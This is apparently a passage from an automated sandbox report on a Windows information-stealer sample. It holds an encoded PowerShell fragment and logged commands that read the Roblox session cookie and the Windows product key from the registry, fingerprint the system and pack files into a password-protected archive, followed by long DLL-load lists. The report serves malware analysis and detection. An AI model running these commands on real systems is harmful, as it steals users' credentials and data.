AAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vebzhwcp\vebzhwcp.cmdline"
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA7D9.tmp" "c:\Users\user\AppData\Local\Temp\vebzhwcp\CSCD4517BE1E6C4428293E27562A6116680.TMP"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\7VKXZ.zip" *
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\Desktop\sppawx.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeSection loaded: vcruntime140.dllJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeSection loaded: python3.dllJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeSection loaded: libffi-8.dllJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeSection loaded: libcrypto-3.dllJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeSection loaded: sqlite3.dllJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeSection loaded: libssl-3.dllJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
